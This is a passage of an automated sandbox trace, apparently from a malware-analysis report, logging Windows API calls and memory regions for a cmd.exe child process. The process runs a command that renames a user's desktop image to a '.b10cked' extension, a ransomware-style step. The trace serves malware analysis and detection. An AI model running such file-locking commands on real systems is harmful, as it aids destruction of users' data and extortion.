dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.311] _close (_FileHandle=4) returned 0 [0142.311] FindNextFileW (in: hFindFile=0x230ea0, lpFindFileData=0x18f56c | out: lpFindFileData=0x18f56c) returned 0 [0142.312] GetLastError () returned 0x12 [0142.312] FindClose (in: hFindFile=0x230ea0 | out: hFindFile=0x230ea0) returned 1 [0142.312] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0142.312] _close (_FileHandle=3) returned 0 [0142.312] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.312] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.313] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.313] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.313] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.313] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.313] SetConsoleInputExeNameW () returned 0x1 [0142.313] GetConsoleOutputCP () returned 0x1b5 [0142.313] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.313] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.313] exit (_Code=0) Process: id = "178" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e40" os_pid = "0xf28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg\" \"C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" 
[0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 15120 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 15121 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 15122 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 15123 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 15124 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 15125 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 15126 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 15127 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 15128 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 15129 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16094 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16095 
start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16096 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16097 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 16098 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 16099 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16100 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16101 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16102 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16103 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16104 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: 
"c:\\windows\\system32\\user32.dll") Region: id = 16105 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16106 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16107 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16108 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 16109 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16110 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16111 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16112 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 16113 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 16114 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 16115 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = 
"" Region: id = 16116 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 16117 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Thread: id = 235 os_tid = 0xf2c [0141.774] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f8cc | out: lpSystemTimeAsFileTime=0x20f8cc*(dwLowDateTime=0x8e700640, dwHighDateTime=0x1d440a9)) [0141.774] GetCurrentProcessId () returned 0xf28 [0141.774] GetCurrentThreadId () returned 0xf2c [0141.774] GetTickCount () returned 0x2c6b7 [0141.774] QueryPerformanceCounter (in: lpPerformanceCount=0x20f8c4 | out: lpPerformanceCount=0x20f8c4*=19856356609) returned 1 [0141.775] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0141.775] __set_app_type (_Type=0x1) [0141.775] __p__fmode () returned 0x76b331f4 [0141.775] __p__commode () returned 0x76b331fc [0141.775] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0141.775] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0141.775] GetCurrentThreadId () returned 0xf2c [0141.775] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf2c) returned 0x38 [0141.775] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.776] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0141.776] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.776] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.776] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f85c | out: phkResult=0x20f85c*=0x0) returned 0x2 [0141.776] 
VirtualQuery (in: lpAddress=0x20f893, lpBuffer=0x20f82c, dwLength=0x1c | out: lpBuffer=0x20f82c*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.776] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f82c, dwLength=0x1c | out: lpBuffer=0x20f82c*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.776] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f82c, dwLength=0x1c | out: lpBuffer=0x20f82c*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.776] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f82c, dwLength=0x1c | out: lpBuffer=0x20f82c*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.776] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f82c, dwLength=0x1c | out: lpBuffer=0x20f82c*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x10000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0141.776] GetConsoleOutputCP () returned 0x1b5 [0141.776] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.776] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0141.776] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.776] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0141.776] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.776] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.777] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.777] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.777] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.777] GetConsoleMode (in: hConsoleHandle=0x3, 
lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.777] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.777] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0141.777] GetEnvironmentStringsW () returned 0x230150* [0141.777] FreeEnvironmentStringsW (penv=0x230150) returned 1 [0141.777] GetEnvironmentStringsW () returned 0x230150* [0141.778] FreeEnvironmentStringsW (penv=0x230150) returned 1 [0141.778] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e7cc | out: phkResult=0x20e7cc*=0x40) returned 0x0 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x0, lpData=0x20e7d8*=0x0, lpcbData=0x20e7d0*=0x1000) returned 0x2 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x4, lpData=0x20e7d8*=0x1, lpcbData=0x20e7d0*=0x4) returned 0x0 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x0, lpData=0x20e7d8*=0x1, lpcbData=0x20e7d0*=0x1000) returned 0x2 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x4, lpData=0x20e7d8*=0x0, lpcbData=0x20e7d0*=0x4) returned 0x0 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x4, lpData=0x20e7d8*=0x40, lpcbData=0x20e7d0*=0x4) returned 0x0 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: 
lpType=0x20e7d4*=0x4, lpData=0x20e7d8*=0x40, lpcbData=0x20e7d0*=0x4) returned 0x0 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x0, lpData=0x20e7d8*=0x40, lpcbData=0x20e7d0*=0x1000) returned 0x2 [0141.778] RegCloseKey (hKey=0x40) returned 0x0 [0141.778] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e7cc | out: phkResult=0x20e7cc*=0x40) returned 0x0 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x0, lpData=0x20e7d8*=0x40, lpcbData=0x20e7d0*=0x1000) returned 0x2 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x4, lpData=0x20e7d8*=0x1, lpcbData=0x20e7d0*=0x4) returned 0x0 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x0, lpData=0x20e7d8*=0x1, lpcbData=0x20e7d0*=0x1000) returned 0x2 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x4, lpData=0x20e7d8*=0x0, lpcbData=0x20e7d0*=0x4) returned 0x0 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x4, lpData=0x20e7d8*=0x9, lpcbData=0x20e7d0*=0x4) returned 0x0 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x4, lpData=0x20e7d8*=0x9, lpcbData=0x20e7d0*=0x4) 
returned 0x0 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x0, lpData=0x20e7d8*=0x9, lpcbData=0x20e7d0*=0x1000) returned 0x2 [0141.778] RegCloseKey (hKey=0x40) returned 0x0 [0141.778] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0141.778] srand (_Seed=0x5b886370) [0141.778] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg\" \"C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg.b10cked\"" [0141.778] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg\" \"C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg.b10cked\"" [0141.778] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.779] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2318b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0141.779] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.779] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.779] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.779] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.779] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.779] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.779] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.779] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 
[0141.779] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0141.779] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.779] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.779] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.779] GetEnvironmentStringsW () returned 0x2322a0* [0141.779] FreeEnvironmentStringsW (penv=0x2322a0) returned 1 [0141.779] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.779] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.779] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.779] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.779] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.779] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.779] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.779] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.779] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.780] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.780] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f598 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.780] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f598, lpFilePart=0x20f594 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f594*="Desktop") returned 0x18 [0141.780] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.780] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f314 | out: lpFindFileData=0x20f314) returned 0x22ffe0 [0141.780] FindClose (in: hFindFile=0x22ffe0 | out: hFindFile=0x22ffe0) returned 1 [0141.780] 
FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f314 | out: lpFindFileData=0x20f314) returned 0x22ffe0 [0141.780] FindClose (in: hFindFile=0x22ffe0 | out: hFindFile=0x22ffe0) returned 1 [0141.780] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f314 | out: lpFindFileData=0x20f314) returned 0x22ffe0 [0141.780] FindClose (in: hFindFile=0x22ffe0 | out: hFindFile=0x22ffe0) returned 1 [0141.780] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.780] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0141.780] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0141.780] GetEnvironmentStringsW () returned 0x232ac0* [0141.781] FreeEnvironmentStringsW (penv=0x232ac0) returned 1 [0141.781] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.781] GetConsoleOutputCP () returned 0x1b5 [0141.781] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.781] GetUserDefaultLCID () returned 0x409 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f6d8, cchData=128 | out: lpLCData="0") returned 2 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f6d8, cchData=128 | out: lpLCData="0") returned 2 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f6d8, cchData=128 | out: lpLCData="1") returned 2 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0141.782] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0141.782] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.783] GetConsoleTitleW (in: lpConsoleTitle=0x2208b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.783] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.783] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0141.783] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0141.783] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0141.784] _wcsicmp (_String1="move", _String2=")") returned 68 [0141.784] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0141.784] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0141.784] _wcsicmp (_String1="IF", _String2="move") returned -4 [0141.784] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0141.784] _wcsicmp (_String1="REM", _String2="move") returned 5 [0141.784] _wcsicmp 
(_String1="REM/?", _String2="move") returned 5 [0141.786] GetConsoleTitleW (in: lpConsoleTitle=0x20f3d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.786] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0141.786] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0141.786] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0141.787] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0141.787] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0141.787] _wcsicmp (_String1="move", _String2="CD") returned 10 [0141.787] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0141.787] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0141.787] _wcsicmp (_String1="move", _String2="REN") returned -5 [0141.787] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0141.787] _wcsicmp (_String1="move", _String2="SET") returned -6 [0141.787] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0141.787] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0141.787] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0141.787] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0141.787] _wcsicmp (_String1="move", _String2="MD") returned 11 [0141.787] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0141.787] _wcsicmp (_String1="move", _String2="RD") returned -5 [0141.787] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0141.787] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0141.787] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0141.787] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0141.787] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0141.787] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0141.787] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0141.787] _wcsicmp (_String1="move", _String2="VER") returned -9 [0141.787] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0141.787] 
